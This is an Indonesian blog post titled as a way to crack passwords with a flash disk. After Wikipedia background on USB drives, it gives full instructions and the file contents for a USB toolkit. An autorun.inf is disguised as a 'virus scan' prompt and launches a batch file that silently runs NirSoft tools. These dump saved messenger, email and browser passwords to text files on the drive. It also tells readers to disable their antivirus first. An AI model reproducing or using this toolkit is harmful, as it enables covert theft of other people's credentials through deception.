Pages

Sabtu, 18 September 2010

Cara Membobol Pasword dengan Flash Disk

USB flash drive (sering juga USB flash drive ini disebut Flashdisk atau UFD) adalah alat penyimpanan data memori flash tipe NAND yang memiliki alat penghubung USB yang terintegrasi. Flash drive ini biasanya berukuran kecil, ringan, serta bisa dibaca dan ditulisi dengan mudah. Per November 2006, kapasitas yang tersedia untuk USB flash drive ada dari 64 megabyte sampai 512 gigabyte. Besarnya kapasitas media ini tergantung dari teknologi memori flash yang digunakan.
USB flash drive memiliki banyak kelebihan dibandingkan alat penyimpanan data lainnya, khususnya disket atau cakram padat. Alat ini lebih cepat, kecil, dengan kapasitas lebih besar, serta lebih dapat diandalkan (karena tidak memiliki bagian yang bergerak) daripada disket.

Namun flashdisk juga memiliki umur penyimpanan data yang singkat, biasanya ketahanan data pada flashdisk rata-rata 5 tahun. Ini disebabkan oleh memori flash yang digunakan tidak bertahan lama. Bandingkan dengan HardDisk yang memiliki ketahanan data hingga 12 tahun, CD/DVD berkualitas (dan bermerek terkenal) selama 15 tahun jika cara penyimpanannya benar.


SUMBER:WIKIPEDIA

naah, dibawah ini ada beberapa tools untuk membobol password lewat flashdisk di download yaa:
  • MessenPass : piranti recover password yang paling populer untuk Program Instant Messenger seperti: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger, Trillian, Miranda, dan Gaim.
  • Mail PassView : merecovery password dari program email seperti: Outlook Express, Microsoft Outlook 2000 (POP3 dan SMTP Account saja), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP dan SMTP Account), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird dan Group Mail Gratis lainnya.
  • IE Passview : adalah utilitas sederhana yang bisa merecovery password dari browser Internet Explorer. Versi ini mendukung Internet Explorer 7.0, serta versi Internet explorer, v4.0 – v6.0.
  • Protected Storage PassView : merecovery semua password yang tersimpan dalam Protected Storage, termasuk AutoComplete password Internet Explorer, password dari situs yang dilindungi sandi, MSN Explorer Sandi, dan masih banyak lagi …
  • PasswordFox : PasswordFox adalah utilitas pemulihan password sederhana yang memungkinkan anda melihat nama pengguna dan sandi yang disimpan oleh browser Mozilla Firefox. Secara default, PasswordFox menampilkan password yang disimpan dalam profil aktif Anda, tetapi Anda dapat dengan mudah memilih untuk melihat password Firefox di lain profil.
  • Berikut adalah cara untuk membuat procedure password hacking toolkit dalam USB Drive (Flashdisk):
    Nb: sebelum melakukan cara di bawah ini kamu harus mendisable anti virus kamu dulu
    • Download dan ekstrak ke 5 tools di atas dan copy file executable (Exe file) saja ke Flashdisk yaitu: Salinlah file – mspass.exe, mailpv.exe, iepv.exe, pspv.exe dan passwordfox.exe ke dalam USB Drive.
    •  lalu Buat file Notepad baru dan dan ketik teks berikut ini :
      [autorun]
      open=launch.bat
      ACTION= Perform a Virus Scan
    • setelah itu simpan Notepad and rename dari New Text Document.txt menjadi autorun.inf, lalu
      copy file autorun.inf ke dalam USB drive.
    • lalu kamu buka lagi notepad dan ketik dan kamu ketik teks berikut:start mspass.exe /stext mspass.txt
      start mailpv.exe /stext mailpv.txt
      start iepv.exe /stext iepv.txt
      start pspv.exe /stext pspv.txt
      start passwordfox.exe /stext passwordfox.txt
    • Simpan file Notepad dan gantilah namanya dari New Text Document.txt menjadi launch.bat, lalu Salin file launch.bat USB drive kamu.
    • naahh , sekarang Flashdisk kamu sudah siap digunakan untuk hack password. tapi, tools Hack ini akan berfungsi  pada Windows 2000, XP, Vista dan 7 serta akan memulihkan password jika ada password yang tersimpan dalam komputer.

      tapi ngomong ngomong kamu sudah tahu cara menggunakannya belum ?
      kalau belum silakan kamu ikuti langkah langkah di bawah ini:

      • Colok flashdisk kamu ke USB Port komputer dan jendela pop-up autorun akan tampil. (Hal ini karena, kamu telah menciptakan sebuah autorun di flashdisk).
      • Pada jendela pop-up, pilih pilihan pertama (melakukan scan Virus).
      • Sekarang, semua hacking tools password berjalan secara diam-diam. Proses ini memakan waktu tidak terlalu lama. Password yang di temukan akan di recover untuk selanjutnya disimpan dalam sebuah file TXT.
      • Selesai
      Nb:saya menulis ini hanya untuk berbagi jadi mohon lakukan cara ini dengan sebaik baiknya dan penulis tidak akan bertanggung jawab atas penyalah gunaan cara ini.

0 komentar:

Posting Komentar